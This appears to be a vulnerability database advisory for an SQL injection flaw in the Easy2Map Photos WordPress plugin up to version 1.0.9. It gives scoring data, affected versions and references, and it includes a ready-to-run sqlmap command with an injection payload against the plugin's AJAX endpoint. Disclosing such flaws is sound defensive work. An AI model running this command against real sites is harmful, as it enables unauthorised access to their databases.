Easy2Map Photos <= 1.0.9 - SQL Injection

2015-06-0800:00:00

Larry W. Cashdollar

wpscan.com

0.003 Low

EPSS

Percentile

66.0%

The code in Functions.php is vulnerable to SQL Injection because they are not parameterising or sanitising user input.

sqlmap -u ‘http://www.example.com/wp-admin/admin-ajax.php’ --data=“mapID=11&mapName;='+or+1%3D%3D1%3B&action;=e2m_img_save_map_name” --cookie=COOKIEHERE --level=5 --risk=3

CPENameOperatorVersion
easy2map-photoslt1.1.0

CPE	Name	Operator	Version
	easy2map-photos	lt	1.1.0

References

packetstormsecurity.com/files/132613/

vapid.dhs.org/advisory.php?v=130

0.003 Low

EPSS

Percentile

66.0%

Related for WPVDB-ID:54B46850-5B87-4000-8A77-BE88715317C8